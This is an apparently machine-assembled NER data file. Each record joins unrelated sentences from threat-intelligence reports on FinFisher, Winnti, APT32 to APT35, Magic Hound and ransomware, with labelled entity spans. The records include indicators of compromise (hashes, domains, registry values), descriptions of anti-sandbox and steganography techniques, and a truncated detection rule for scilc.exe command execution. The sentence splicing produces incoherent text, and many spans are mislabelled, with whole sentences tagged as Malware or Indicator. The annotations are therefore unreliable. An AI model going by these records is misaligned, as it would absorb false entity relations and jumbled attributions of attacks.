{"text": "Figure 6 . The Magic Hound attacks did not rely on exploit code to compromise targeted systems , instead relying on Excel and Word documents containing malicious macros . Second stage samples ( Win64/Winnti.BN ) A clever example was \u2018 Office Monkeys LOL Video.zip \u2019 .", "spans": [{"start": 194, "end": 209, "label": "Indicator"}, {"start": 235, "end": 263, "label": "Indicator"}]}
{"text": "One of the obfuscation tricks included by the malware authors in a VM opcode dispatcher Even armed with the knowledge we have described so far , it still took us many hours to write a full-fledged opcode interpreter that \u2019 s able to reconstruct the real code executed by FinFisher . The MPK bot is not publicly available and had previously been attributed to an adversary group called \" Rocket Kitten \" which has often been thought to be a state sponsored adversary operating in the Middle East region . Winnti : Dropper delivered by api.goallbandungtravel.com . Sandworm potentially developed the disruptive capability as early as three weeks prior to the OT event , suggesting the attacker may have been waiting for a specific moment to deploy the capability .", "spans": [{"start": 271, "end": 280, "label": "Malware"}, {"start": 287, "end": 294, "label": "System"}, {"start": 372, "end": 377, "label": "Organization"}, {"start": 387, "end": 400, "label": "Organization"}, {"start": 504, "end": 510, "label": "Organization"}, {"start": 534, "end": 560, "label": "Indicator"}, {"start": 563, "end": 571, "label": "Organization"}, {"start": 657, "end": 659, "label": "System"}]}
{"text": "Stage 1 : Loader malware keeps sandbox and debuggers away The first stage of FinFisher running through this complicated virtual machine is a loader malware designed to probe the system and determine whether it \u2019 s running in a sandbox environment ( typical for cloud-based detonation solution like Office 365 ATP ) . One payload was a Python based open source remote administration tool ( RAT ) called Pupy . Winnti : 4256fa6f6a39add6a1fa10ef1497a74088f12be0 2018-07-25 10:13:41 None . According to Kaspersky telemetry , targeted organizations included political bodies in Europe .", "spans": [{"start": 77, "end": 86, "label": "Malware"}, {"start": 298, "end": 312, "label": "System"}, {"start": 389, "end": 392, "label": "System"}, {"start": 402, "end": 406, "label": "System"}, {"start": 409, "end": 415, "label": "Organization"}, {"start": 418, "end": 458, "label": "Indicator"}, {"start": 499, "end": 508, "label": "Organization"}, {"start": 553, "end": 569, "label": "Organization"}]}
{"text": "The loader first dynamically rebuilds a simple import address table ( IAT ) , resolving all the API needed from Kernel32 and NtDll libraries . The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method , specifically attempting to load MagicHound.Rollover . Winnti : bb4ab0d8d05a3404f1f53f152ebd79f4ba4d4d81 2018-10-10 09:57:31 http://checkin.travelsanignacio.com . Developed in - house using C++ , the NoEscape ransomware uses a hybrid approach to encryption , combining ChaCha20 and RSA encryption algorithms for file encryption and key protection .", "spans": [{"start": 281, "end": 300, "label": "System"}, {"start": 303, "end": 309, "label": "Organization"}, {"start": 312, "end": 352, "label": "Indicator"}, {"start": 373, "end": 408, "label": "Indicator"}, {"start": 448, "end": 467, "label": "Malware"}]}
{"text": "It then continues executing in a spawned new thread that checks if there are additional undesired modules inside its own virtual address space ( for example , modules injected by certain security solutions ) . Many of the Fetch samples we analyzed attempted to obfuscate their functionality by encrypting their embedded strings using AES . Winnti : T1195 Supply Chain Compromise . Someone motivated by money will likely cast a wide net and look for easy targets .", "spans": [{"start": 334, "end": 337, "label": "System"}, {"start": 340, "end": 346, "label": "Organization"}]}
{"text": "It eventually kills all threads that belong to these undesired modules ( using ZwQueryInformationThread native API with ThreadQuerySetWin32StartAddress information class ) . The loader 's main goal was to run a PowerShell command to execute shellcode . Winnti : T1050 New Service . The script contains 1,759 lines of code .", "spans": [{"start": 211, "end": 229, "label": "System"}, {"start": 253, "end": 259, "label": "Organization"}, {"start": 282, "end": 321, "label": "Malware"}]}
{"text": "The first anti-sandbox technique is the loader checking the code segment . To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys . Winnti : T1022 Data Encrypted . Another finding in the activity of ' Sharpshooter ' were a set of unobfuscated connections from IP addresses in Windhoek , a city in Namibia , Africa .", "spans": [{"start": 129, "end": 143, "label": "Malware"}, {"start": 202, "end": 231, "label": "Malware"}, {"start": 234, "end": 240, "label": "Organization"}, {"start": 332, "end": 374, "label": "Indicator"}]}
{"text": "If it \u2019 s not 0x1B ( for 32-bit systems ) or 0x23 ( for 32-bit system under Wow64 ) , the loader exits . The Magic Hound campaign was also discovered using a custom dropper tool , which we have named MagicHound.DropIt . Winnti : T1079 Multilayer Encryption . \u201c lun.vbs \u201d , which runs n.bat", "spans": [{"start": 158, "end": 172, "label": "System"}, {"start": 200, "end": 217, "label": "Malware"}, {"start": 220, "end": 226, "label": "Organization"}, {"start": 259, "end": 289, "label": "Indicator"}]}
{"text": "Next , the dropper checks its own parent process for indications that it is running in a sandbox setup . We have also seen Magic Hound using DropIt as a binder , specifically dropping a legitimate decoy executable along with the malicious executable onto the target host . Winnti : T1032 Standard Cryptographic Protocol ( RC4 , RC5 ) . title : MicroSCADA SCILC Command Execution description : Identification of Events or Host Commands that are related to the MicroSCADA SCILC programming language and specifically command execution author : Mandiant date : 2023/02/27 logsource : product : windows service : security detection : selection : NewProcessName|endswith : - \\scilc.exe CommandLine|contains : -", "spans": [{"start": 141, "end": 147, "label": "System"}, {"start": 273, "end": 279, "label": "Organization"}, {"start": 393, "end": 531, "label": "Indicator"}, {"start": 541, "end": 549, "label": "Organization"}]}
{"text": "It calculates the MD5 hash of the lower-case process image name and terminates if one of the following conditions are met : The MD5 hash of the parent process image name is either D0C4DBFA1F3962AED583F6FCE666F8BC or 3CE30F5FED4C67053379518EACFCF879 The parent process \u2019 s full image path is equal to its own process path If these initial checks are passed , the loader builds a complete IAT by reading four imported libraries from disk ( ntdll.dll We also found a second IRC bot called MPK using the same IP for its C2 server that a Leash sample was hosted on . Winnti : T1043 Commonly Used Port ( 80 , 443 ) . Users were drawn to a login prompt that was designed to harvest user credentials with pages that looked like Adobe , Microsoft , etc .", "spans": [{"start": 180, "end": 212, "label": "Indicator"}, {"start": 216, "end": 248, "label": "Indicator"}, {"start": 438, "end": 447, "label": "Indicator"}, {"start": 471, "end": 478, "label": "System"}, {"start": 486, "end": 489, "label": "System"}, {"start": 533, "end": 545, "label": "System"}, {"start": 562, "end": 568, "label": "Organization"}, {"start": 720, "end": 725, "label": "System"}, {"start": 728, "end": 737, "label": "System"}]}
{"text": ", kernel32.dll , advapi32.dll , and version.dll ) and remapping them in memory . The Magic Hound attack campaign is an active and persistent espionage motivated adversary operating in the Middle East region . OceanLotus Steganography Malware Analysis White Paper . Eventually , when the DLL is copied into its final path , rundll32.exe is used to call the exported function SetQueryNetSessionCount , which downloads the next stage .", "spans": [{"start": 2, "end": 14, "label": "Indicator"}, {"start": 17, "end": 29, "label": "Indicator"}, {"start": 36, "end": 47, "label": "Indicator"}, {"start": 141, "end": 150, "label": "Organization"}, {"start": 209, "end": 219, "label": "Organization"}, {"start": 287, "end": 290, "label": "Malware"}, {"start": 323, "end": 335, "label": "Indicator"}]}
{"text": "This technique makes use of debuggers and software breakpoints useless . Organizations in the government , energy , and technology sectors have been targeted by Magic Hound , specifically organizations based in or doing business in Saudi Arabia . While continuing to monitor activity of the OceanLotus APT Group , BlackBerry Cylance researchers uncovered a novel payload loader that utilizes steganography to read an encrypted payload concealed within a .png image file . An example of these log entries can be found below : By correlating the user , IP address and GUID from the Remote PowerShell HTTP logs to the Exchange frontend , CrowdStrike found a request using the mailbox to the following OWA URL , , corresponding to the IIS log entry below : The backend request for the new exploitation chain is similar to the example shown below : This request seemed to show a novel , previously undocumented , way to reach the PowerShell remoting service through the OWA frontend endpoint , instead of leveraging the endpoint .", "spans": [{"start": 94, "end": 104, "label": "Organization"}, {"start": 107, "end": 113, "label": "Organization"}, {"start": 120, "end": 138, "label": "Organization"}, {"start": 291, "end": 301, "label": "Organization"}, {"start": 314, "end": 332, "label": "Organization"}, {"start": 525, "end": 744, "label": "Malware"}]}
{"text": "During this stage , the loader may also call a certain API using native system calls , which is another way to bypass breakpoints on API and security solutions using hooks . At a high level , Retriever is a .NET downloader that downloads secondary payloads from servers associated with Magic Hound . The steganography algorithm appears to be bespoke and utilizes a least significant bit approach to minimize visual differences when compared with the original image to prevent analysis by discovery tools . \" VP Labs RD and Deputy CSO at LogRhythm .", "spans": [{"start": 192, "end": 201, "label": "System"}, {"start": 207, "end": 222, "label": "System"}, {"start": 508, "end": 546, "label": "Organization"}]}
{"text": "Figure 7 . For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer . Once decoded , decrypted , and executed , an obfuscated loader will load one of the APT32 backdoors . They also added a new user for persistence and used the Wput tool to exfiltrate the victims files to their own FTP server .", "spans": [{"start": 39, "end": 52, "label": "System"}, {"start": 136, "end": 159, "label": "Malware"}, {"start": 190, "end": 213, "label": "Malware"}, {"start": 238, "end": 260, "label": "System"}, {"start": 347, "end": 352, "label": "Organization"}, {"start": 421, "end": 425, "label": "System"}]}
{"text": "FinFisher loader calling native Windows API to perform anti-debugging tricks At this point , the fun in analysis is not over . M-Trends 2018 can arm security teams with the knowledge they need to defend against today 's most often used cyber attacks , as well as lesser seen and emerging threats . Thus far , BlackBerry Cylance has observed two backdoors being used in combination with the steganography loader \u2013 a version of Denes backdoor ( bearing similarities to the one described by ESET ) , and an updated version of Remy backdoor . PREDATOR is intended to work with another spyware component called \u201c ALIEN \u201d ( it \u2019s not \u201c Alien vs. Predator \u201d this time ; they \u2019re working together ) .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 32, "end": 39, "label": "System"}, {"start": 127, "end": 135, "label": "Organization"}, {"start": 309, "end": 327, "label": "Organization"}, {"start": 426, "end": 440, "label": "Malware"}, {"start": 488, "end": 492, "label": "Organization"}, {"start": 523, "end": 536, "label": "Malware"}, {"start": 539, "end": 547, "label": "Malware"}, {"start": 608, "end": 613, "label": "Malware"}, {"start": 630, "end": 635, "label": "Malware"}, {"start": 640, "end": 648, "label": "Malware"}]}
{"text": "A lot of additional anti-sandbox checks are performed in this exact order : Check that the malware is not executed under the root folder of a drive Check that the malware file is readable from an external source Check that the hash of base path is not 3D6D62AF1A7C8053DBC8E110A530C679 Check that the full malware path contains only human readable characters ( \u201c a-z \u201d , \u201c A-Z \u201d , and \u201c 0-9 \u201d ) Check that no node in the full path contains the MD5 string of the malware FireEye tracks thousands of threat actors , but pays special attention to state-sponsored attackers who carry out advanced persistent threat ( APT ) attacks . However , this can be easily modified by the threat actor to deliver other malicious payloads . Adversaries may also use CLIs to install and run new software , including malicious tools that may be installed over the course of an operation .", "spans": [{"start": 252, "end": 284, "label": "Indicator"}, {"start": 469, "end": 476, "label": "Organization"}, {"start": 497, "end": 510, "label": "Organization"}, {"start": 559, "end": 568, "label": "Organization"}, {"start": 612, "end": 615, "label": "Organization"}]}
{"text": "file Fingerprint the system and check the following registry values : HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid should not be \u201c 6ba1d002-21ed-4dbe-afb5-08cf8b81ca32 \u201d HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\DigitalProductId should not be \u201c 55274-649-6478953-23109 \u201d , \u201c A22-00001 \u201d , or \u201c 47220 \u201d HARDWARE\\Description\\System\\SystemBiosDate should not contain \u201c 01/02/03 \u201d Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations with investments in Vietnam , foreign governments , journalists , and Vietnamese dissidents . The complexity of the shellcode and loaders shows the group continues to invest heavily in development of bespoke tooling . Mandiant directly observed one ( 1 ) variant of STRATOFEAR as a Mach - O executable compiled for ARM64 systems that contained a self - signed certificate with a particular Common Name ( CN ) .", "spans": [{"start": 70, "end": 118, "label": "Indicator"}, {"start": 135, "end": 171, "label": "Indicator"}, {"start": 174, "end": 240, "label": "Indicator"}, {"start": 257, "end": 280, "label": "Indicator"}, {"start": 287, "end": 296, "label": "Indicator"}, {"start": 306, "end": 311, "label": "Indicator"}, {"start": 314, "end": 356, "label": "Indicator"}, {"start": 411, "end": 416, "label": "Organization"}, {"start": 437, "end": 453, "label": "Organization"}, {"start": 469, "end": 489, "label": "Organization"}, {"start": 520, "end": 539, "label": "Organization"}, {"start": 542, "end": 553, "label": "Organization"}, {"start": 571, "end": 581, "label": "Organization"}, {"start": 805, "end": 818, "label": "System"}]}
{"text": "Check that the mutex WininetStartupMutex0 does not already exist Check that no DLL whose base name has hash value of 0xC9CEF3E4 is mapped into the malware address space The hashes in these checks are most likely correspond to sandbox or security products that the FinFisher authors want to avoid . During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . This white paper describes the steganography algorithm used in two distinct loader variants and looks at the launcher of the backdoor that was encoded in one of the .png cover images . mcvsocfg.dll : In April , Talos discovered a new ransomware actor , RA Group , conducting double extortion attacks using their ransomware variant based on leaked Babuk source code .", "spans": [{"start": 117, "end": 127, "label": "Indicator"}, {"start": 264, "end": 273, "label": "Malware"}, {"start": 325, "end": 330, "label": "Organization"}, {"start": 372, "end": 397, "label": "Malware"}, {"start": 625, "end": 637, "label": "Indicator"}, {"start": 651, "end": 656, "label": "Organization"}, {"start": 693, "end": 701, "label": "Organization"}, {"start": 787, "end": 804, "label": "Malware"}]}
{"text": "Next , the loader checks that it \u2019 s not running in a virtualized environment ( VMWare or Hyper-V ) or under a debugger . Evidence also suggests that APT32 has targeted network security and technology infrastructure corporations with connections to foreign investors . ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4 Malware/Backdoor 659 KB ( 674 , 816 bytes ) PE32 executable for MS Windows ( DLL ) ( console ) Intel 80386 32-bit September 2018 . Getting access to the C2 information helped the researchers get a clear view of the attacker 's operations and utilities .", "spans": [{"start": 80, "end": 86, "label": "System"}, {"start": 90, "end": 97, "label": "System"}, {"start": 150, "end": 155, "label": "Organization"}, {"start": 169, "end": 185, "label": "Organization"}, {"start": 190, "end": 228, "label": "Organization"}, {"start": 269, "end": 333, "label": "Indicator"}, {"start": 401, "end": 408, "label": "System"}, {"start": 411, "end": 414, "label": "System"}, {"start": 429, "end": 434, "label": "Organization"}, {"start": 487, "end": 489, "label": "System"}]}
{"text": "For the hardware virtualization check , the loader obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list . Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations foreign governments . This particular OceanLotus malware loader attempts to imitate McAfee \u2019s McVsoCfg DLL and expects to be side-loaded by the legitimate \" On Demand Scanner \" executable . Seven of the vulnerabilities included in today \u2019s Vulnerability Roundup have a CVSS severity score of 9.8 out of a possible 10 .", "spans": [{"start": 177, "end": 182, "label": "Organization"}, {"start": 203, "end": 219, "label": "Organization"}, {"start": 235, "end": 255, "label": "Organization"}, {"start": 264, "end": 275, "label": "Organization"}, {"start": 294, "end": 304, "label": "Organization"}, {"start": 350, "end": 362, "label": "System"}, {"start": 525, "end": 572, "label": "Indicator"}]}
{"text": "In our tests , the malware sample was able to easily detect both VMWare and Hyper-V environments through the detection of the virtualized peripherals ( for example , Vmware has VEN_15AD as vendor ID , HyperV has VMBus as bus name ) . FireEye asesses that APT32 actors may be aligned with the national interests of Vietnam . It arrives together with an encrypted payload stored in a separate .png image file . Data transfer to a thirdparty tool may be authorized , but it may not be common practice to continuously ping internal servers for external data transfer requests .", "spans": [{"start": 65, "end": 71, "label": "System"}, {"start": 76, "end": 83, "label": "System"}, {"start": 166, "end": 172, "label": "Organization"}, {"start": 234, "end": 241, "label": "Organization"}, {"start": 255, "end": 267, "label": "Organization"}, {"start": 409, "end": 571, "label": "Indicator"}]}
{"text": "Office 365 ATP sandbox employs special mechanisms to avoid being detected by similar checks . APT32 poses a threat to companies doing business or preparing to invest in Vietnam . The .png cover file is actually a valid image file that is not malicious on its own . This new ransomware variant does n't have any novel features or functionality and points to the challenges organizations are facing as the landscape continues to shift and a plethora of new actors join their ranks .", "spans": [{"start": 0, "end": 14, "label": "System"}, {"start": 94, "end": 99, "label": "Organization"}]}
{"text": "The loader \u2019 s anti-debugger code is based on the following three methods : The first call aims to destroy the debugger connection : NOTE : This call completely stops the execution of WinDbg and other debuggers The second call tries to detect the presence of a debugger : The final call tries to destroy the possibility of adding software breakpoint : Finally , if the loader is happy with all the checks done so far , based on the victim operating system ( 32 or 64-bit ) it proceeds to decrypt a set of fake bitmap resources ( stage 2 We believe recent activity targeting private interests in Vietnam suggests that APT32 poses a threat to companies doing business or preparing to invest in the country . The payload is encoded inside this image with the use of a technique called steganography , which utilizes the least significant bits of each pixel\u2019s color code to store hidden information , without making overtly visible changes to the picture itself . The actor hunts for confidential information stored in the networks of governmental organizations , political groups and think tanks , as well as various individuals involved in defense and geopolitical related research .", "spans": [{"start": 617, "end": 622, "label": "Organization"}, {"start": 1031, "end": 1057, "label": "Organization"}, {"start": 1060, "end": 1076, "label": "Organization"}, {"start": 1081, "end": 1092, "label": "Organization"}, {"start": 1106, "end": 1179, "label": "Organization"}]}
{"text": ") embedded in the executable and prepares the execution of a new layer of VM decoding . DROPSHOT is a notable piece of malware used to deliver variants of the TURNEDUP backdoor . The encoded payload is additionally encrypted with AES128 and further obfuscated with XOR in an attempt to fool steganography detection tools . Once installed , the trojan could disrupt operations within systems and networks or exfiltrate confidential data .", "spans": [{"start": 88, "end": 96, "label": "System"}, {"start": 119, "end": 126, "label": "System"}, {"start": 135, "end": 176, "label": "Malware"}, {"start": 265, "end": 268, "label": "System"}, {"start": 344, "end": 350, "label": "Malware"}]}
{"text": "Each bitmap resource is extracted , stripped of the first 0x428 bytes ( BMP headers and garbage data ) , and combined into one file . Additionally , there is evidence to suggest APT33 targeted Saudi Arabia . Features : The executable within this not only played a very funny video , but dropped and ran another CozyDuke executable .", "spans": [{"start": 178, "end": 183, "label": "Organization"}]}
{"text": "The block is decrypted using a customized algorithm that uses a key derived from the original malware dropper \u2019 s TimeDateStamp field multiplied by 5 . APT33 often conducts spear-phishing operations using a built-in phishing module . Side-loaded DLL Loads next-stage payload using custom .png steganography Uses AES128 implementation from Crypto++ library for payload decryption Known to load Denes backdoor , might possibly be used also with other payloads . Threat actors regularly adapt and make use of red team tools - such as commercial and publicly available exploitation frameworks - to facilitate real world attacks , like TEMP.Veles \u2019 use of METERPRETER during .", "spans": [{"start": 152, "end": 157, "label": "Organization"}, {"start": 246, "end": 249, "label": "System"}, {"start": 281, "end": 306, "label": "System"}, {"start": 339, "end": 355, "label": "System"}, {"start": 393, "end": 407, "label": "Malware"}, {"start": 460, "end": 473, "label": "Organization"}, {"start": 506, "end": 520, "label": "System"}, {"start": 631, "end": 641, "label": "Malware"}, {"start": 651, "end": 662, "label": "System"}]}
{"text": "Figure 8 . Additionally , there is evidence to suggest APT33 targeted Saudi Arabian and Western organizations that provide training , maintenance and support for Saudi Arabia 's military and commercial fleets . The malicious DLL exports the same function names as the original mcvsocfg.dll library . HHS HC3 warned that the stolen credentials may have been used to compromise a number of healthcare organizations and enterprises in other industries .", "spans": [{"start": 55, "end": 60, "label": "Organization"}, {"start": 178, "end": 186, "label": "Organization"}, {"start": 191, "end": 201, "label": "Organization"}, {"start": 225, "end": 228, "label": "System"}, {"start": 277, "end": 289, "label": "Indicator"}, {"start": 300, "end": 307, "label": "Organization"}, {"start": 388, "end": 412, "label": "Organization"}, {"start": 417, "end": 448, "label": "Organization"}]}
{"text": "The fake bitmap image embedded as resource The 32-bit stage 2 malware uses a customized loading mechanism ( i.e. , the PE file has a scrambled IAT and relocation table ) and exports only one function . Although we have only observed APT33 use DROPSHOT to deliver TURNEDUP , we have identified multiple DROPSHOT samples in the wild that delivered wiper malware we call SHAPESHIFT . All exports contain the exact same code which will decrypt the payload , inject it into memory , and execute it . STRATOFEAR \u2019s code references five predefined module types that have an ID value and an internal name :", "spans": [{"start": 233, "end": 238, "label": "Organization"}, {"start": 243, "end": 251, "label": "System"}, {"start": 302, "end": 318, "label": "System"}, {"start": 368, "end": 378, "label": "System"}, {"start": 495, "end": 513, "label": "Malware"}, {"start": 514, "end": 596, "label": "Malware"}]}
{"text": "For the 64-bit stage 2 malware , the code execution is transferred from the loader using a well-known technique called Heaven \u2019 s Gate . The SHAPESHIFT wiper is capable of wiping disks and volumes , as well as deleting files . The payload is encoded inside a separate .png file using a technique called steganography . After further research , we were able to link Hack520 to different network administration activities , notably with a Virtual Private Server ( VPS ) hosting service .", "spans": [{"start": 141, "end": 157, "label": "System"}, {"start": 172, "end": 196, "label": "Malware"}, {"start": 210, "end": 224, "label": "Malware"}, {"start": 365, "end": 372, "label": "Organization"}, {"start": 437, "end": 483, "label": "System"}]}
{"text": "In the next sections , for simplicity , we will continue the analysis only on the 64-bit payload . Ties to SHAPESHIFT suggest that APT33 may engage in destructive operations or shares tools or development resources with an Iranian threat group that conducts destructive operations . On top of that , the decoded payload is also encrypted with AES-128 and finally obfuscated with XOR 0x3B . This then offered a means to log on using email providers , which could then capture the passwords and user names .", "spans": [{"start": 107, "end": 117, "label": "System"}, {"start": 131, "end": 136, "label": "Organization"}, {"start": 231, "end": 243, "label": "Organization"}]}
{"text": "Figure 9 . In a recent attack , APT33 sent spear-phishing emails to workers in the aviation industry . It\u2019s worth noting that the XOR key is not hardcoded , but instead is read from the first byte of the C:\\Windows\\system.ini file . Based on these findings , CrowdStrike assesses it is highly likely that the OWA technique employed is in fact tied to CVE-2022 - 41080 .", "spans": [{"start": 32, "end": 37, "label": "Organization"}, {"start": 83, "end": 100, "label": "Organization"}, {"start": 130, "end": 133, "label": "System"}, {"start": 204, "end": 225, "label": "Indicator"}, {"start": 259, "end": 270, "label": "Organization"}, {"start": 351, "end": 367, "label": "Vulnerability"}]}
{"text": "Heaven \u2019 s gate is still in use in 2017 Stage 2 : A second multi-platform virtual machine The 64-bit stage 2 malware implements another loader combined with another virtual machine . The HTA files contained job descriptions and links to job postings on popular employment websites . One of the payloads we encountered was encoded inside an image of Kaito Kuroba1 , the gentleman thief character from a popular Japanese manga series . Exploitation of CVE-2023 - 4966 will not crash the NSPPE process and generate memory core dump files .", "spans": [{"start": 187, "end": 196, "label": "Malware"}, {"start": 197, "end": 233, "label": "Malware"}, {"start": 450, "end": 465, "label": "Vulnerability"}]}
{"text": "The architecture is quite similar to the one described previously , but the opcodes are slightly different . Since at least 2014 , an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran . To extract the payload , the malware will first initialize the GDI+ API and get the image width and height values . New variants based on leaked code are becoming more common We have continued seeing various malicious campaigns since the start of 2023 , where the threat actors have used new ransomware variants based on leaked source code or builders .", "spans": [{"start": 142, "end": 154, "label": "Organization"}, {"start": 166, "end": 173, "label": "Organization"}, {"start": 177, "end": 182, "label": "Organization"}, {"start": 397, "end": 408, "label": "Organization"}]}
{"text": "After reversing these opcodes , we were able to update our interpreter script to support both 32-bit and 64-bit virtual machines used by FinFisher . These emails included recruitment-themed lures and links to malicious HTML application ( HTA ) files . The size of the payload is encoded within the first four pixels of the image . TLDR OilRig is leveraging a new backdoor dubbed Marlin as part of a longrunning espionage campaign that started in April 2018 .", "spans": [{"start": 137, "end": 146, "label": "Malware"}, {"start": 219, "end": 235, "label": "System"}, {"start": 238, "end": 241, "label": "Malware"}, {"start": 336, "end": 342, "label": "Organization"}, {"start": 379, "end": 385, "label": "Malware"}]}
{"text": "INDEX MNEMONIC DESCRIPTION 0x0 JMP Special obfuscated conditional Jump ( always taken or always ignored ) 0x1 JMP Jump to a function ( same as opcode 0x10 ) 0x2 CALL Call to the function pointed by the internal VM value 0x3 CALL Optimized CALL function ( like the 0x1E opcode of the 32-bit VM ) 0x4 EXEC Execute code and move to the next packet 0x5 JMP Jump to an internal function 0x6 NOP No operation , move to the The OilRig group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries . After obtaining the size , the malware will allocate an appropriate memory buffer and proceed to decode the remaining payload byte by byte . \u201c n.bat \u201d , which likely runs the native scilc.exe utility", "spans": [{"start": 421, "end": 433, "label": "Organization"}, {"start": 495, "end": 504, "label": "Organization"}, {"start": 507, "end": 517, "label": "Organization"}, {"start": 520, "end": 526, "label": "Organization"}, {"start": 529, "end": 537, "label": "Organization"}, {"start": 540, "end": 558, "label": "Organization"}, {"start": 723, "end": 781, "label": "Indicator"}]}
{"text": "next packet 0x7 CALL Call an imported API ( whose address is stored in the internal VM value ) 0x8 LOAD Load a value into the VM descriptor structure * 0x9 STORE Store the internal VM value inside a register 0xA WRITE Resolve a pointer and store the value of a register in its content 0xB READ Move the value pointed by the VM internal value into a register 0xC LOAD Load a value into the VM descriptor structure ( not optimized ) 0xD CMP Compare the value pointed by the internal VM descriptor APT34 uses a mix of public and non-public tools . The payload is encoded in the same way as the size \u2013 each byte of the payload is computed from the ARGB color codes of each subsequent pixel in the image . It uses a hardcoded mutex value to make sure that the victim is not infected twice by calling followed by a call to to check the last error code .", "spans": [{"start": 495, "end": 500, "label": "Organization"}, {"start": 515, "end": 542, "label": "System"}, {"start": 701, "end": 783, "label": "Malware"}, {"start": 787, "end": 847, "label": "Malware"}]}
{"text": "with a register 0xE CMP Compare the value pointed by the internal VM descriptor with an immediate value 0xF XCHG Exchange the value pointed by the internal VM descriptor with a register 0x10 SHL Jump to a function ( same as opcode 0x1 ) This additional virtual machine performs the same duties as the one already described but in a 64-bit environment . APT34 often uses compromised accounts to conduct spear-phishing operations . In case the payload is bigger than the image used to store it , the remaining payload bytes are simply attached to the image after its IEND marker , and read directly from the file . NoEscape is a new ransomware which been doing the rounds in underground forums since May 2023 .", "spans": [{"start": 353, "end": 358, "label": "Organization"}, {"start": 370, "end": 390, "label": "System"}, {"start": 613, "end": 621, "label": "Malware"}]}
{"text": "It extracts and decrypts the stage 3 malware , which is stored in encrypted resources such as fake dialog boxes . APT33 leverages a mix of public and non-public tools and often conducts spear-phishing operations using a built-in phishing module from \" ALFA TEaM Shell \" , a publicly available web shell . The pixel encoding algorithm is fairly straightforward and aims to minimize visual differences when compared to the original image by only modifying the least significant bits of the red , green , and blue color byte values . For these reasons , OT defenders and asset owners should take mitigating actions against COSMICENERGY to preempt in the wild deployment and to better understand common features and capabilities that are frequently deployed in OT malware .", "spans": [{"start": 114, "end": 119, "label": "Organization"}, {"start": 139, "end": 166, "label": "System"}, {"start": 252, "end": 267, "label": "System"}, {"start": 274, "end": 302, "label": "System"}, {"start": 551, "end": 563, "label": "Organization"}, {"start": 568, "end": 580, "label": "Organization"}, {"start": 620, "end": 632, "label": "Malware"}]}
{"text": "The extraction method is the same , but the encryption algorithm ( also XOR ) is much simpler . In July 2017 , FireEye observed APT34 targeting an organization in the Middle East using the POWRUNER PowerShell-based backdoor and the downloader BONDUPDATER , which includes a domain generation algorithm ( DGA ) for command and control . The alpha channel byte remains unchanged . In particular , we managed to gather details on an individual using the handle Hack520 , who we believe is connected to Winnti .", "spans": [{"start": 111, "end": 118, "label": "Organization"}, {"start": 128, "end": 133, "label": "Organization"}, {"start": 189, "end": 223, "label": "System"}, {"start": 243, "end": 254, "label": "System"}, {"start": 458, "end": 465, "label": "Organization"}, {"start": 499, "end": 505, "label": "Organization"}]}
{"text": "The new payload is decrypted , remapped , and executed in memory , and represents the installation and persistence stage of the malware . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . To encode a byte of the payload , the first three bits ( 0-2 ) are stored in the red color , the next three bits ( 3-5 ) are stored in the green color , and the final two bits ( 6-7 ) are stored in the blue color . This type of vulnerability is known as a server - side request forgery ( SSRF ) .", "spans": [{"start": 138, "end": 146, "label": "System"}, {"start": 179, "end": 187, "label": "Malware"}, {"start": 203, "end": 216, "label": "Vulnerability"}, {"start": 475, "end": 513, "label": "Vulnerability"}]}
{"text": "Stage 3 : Installer that takes DLL side-loading to a new level Stage 3 represents the setup program for FinFisher . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . Decoding is a simple inverse operation . The ransomware will then scan the disk and any files matching predefined criteria are encrypted and the original files are deleted .", "spans": [{"start": 104, "end": 113, "label": "Malware"}, {"start": 135, "end": 140, "label": "Organization"}, {"start": 155, "end": 185, "label": "Vulnerability"}, {"start": 186, "end": 200, "label": "Vulnerability"}, {"start": 211, "end": 219, "label": "System"}, {"start": 224, "end": 235, "label": "System"}, {"start": 259, "end": 268, "label": "Organization"}, {"start": 331, "end": 341, "label": "Malware"}]}
{"text": "It is the first plain stage that does not employ a VM or obfuscation . FireEye has identified APT35 operations dating back to 2014 . Windows converts the .png pixel RGBA value to an ARGB encoding via the GdpiBitmapGetPixel API . Notably , the main function contains logic flaws that cause it to only be able to connect to an MSSQL server and upload ( LIGHTWORK ) to it , before immediately attempting to clean itself up .", "spans": [{"start": 71, "end": 78, "label": "Organization"}, {"start": 94, "end": 99, "label": "Organization"}, {"start": 133, "end": 140, "label": "System"}, {"start": 204, "end": 226, "label": "System"}, {"start": 239, "end": 421, "label": "Malware"}]}
{"text": "The code supports two different installation methods : setup in a UAC-enforced environment ( with limited privileges ) , or an installation with full-administrative privileges enabled ( in cases where the malware gains the ability to run with elevated permissions ) . APT35 , also known as the Newscaster Team , is a threat group sponsored by the Iranian government that conducts long term , resource-intensive operations to collect strategic intelligence . To aid in the recovery of encrypted payloads , the following Python script can be used to decode pixel colors from a .png image . If the main function is called with only , it will take the path that is intended for connect to the MSSQL server and , upload \u2022 None are supplied to the main function , it will immediately fail due to attempting to utilize command line arguments that were not parsed yet .", "spans": [{"start": 66, "end": 90, "label": "System"}, {"start": 268, "end": 273, "label": "Organization"}, {"start": 294, "end": 309, "label": "Organization"}, {"start": 317, "end": 329, "label": "Organization"}, {"start": 519, "end": 532, "label": "System"}, {"start": 717, "end": 859, "label": "Indicator"}]}
